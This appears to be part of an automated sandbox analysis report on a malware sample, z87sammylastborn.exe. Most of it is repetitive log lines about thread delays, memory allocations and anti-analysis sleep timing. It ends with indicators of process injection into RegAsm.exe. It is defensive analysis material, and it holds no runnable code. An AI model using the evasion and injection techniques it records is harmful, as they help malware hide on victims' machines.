                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: z87sammylastborn.exe PID: 5656, type: MEMORYSTR
                Source: C:\Users\user\Desktop\z87sammylastborn.exeMemory allocated: CA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeMemory allocated: 2AA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeMemory allocated: FC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1130000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2AF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2890000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598334Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596233Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594896Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594780Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594541Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 8440Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1423Jump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exe TID: 5884Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -599890s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7096Thread sleep count: 8440 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -599781s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7096Thread sleep count: 1423 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -599672s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -599562s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -599453s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -599344s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -599234s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -599125s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -599015s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -598906s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -598797s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -598687s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -598578s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -598469s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -598334s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -598219s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -598109s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -598000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -597890s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -597781s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -597672s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -597562s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -597453s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -597344s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -597219s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -597109s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -597000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -596890s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -596781s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -596672s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -596562s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -596453s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -596344s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -596233s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -596125s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -596015s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -595906s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -595797s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -595687s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -595578s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -595469s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -595359s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -595250s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -595140s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -595031s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -594896s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -594780s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -594671s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268Thread sleep time: -594541s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598334Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596233Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594896Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594780Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594541Jump to behavior
                Source: RegAsm.exe, 00000003.00000002.4533054853.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02A4C168 LdrInitializeThunk,LdrInitializeThunk,3_2_02A4C168
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\z87sammylastborn.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
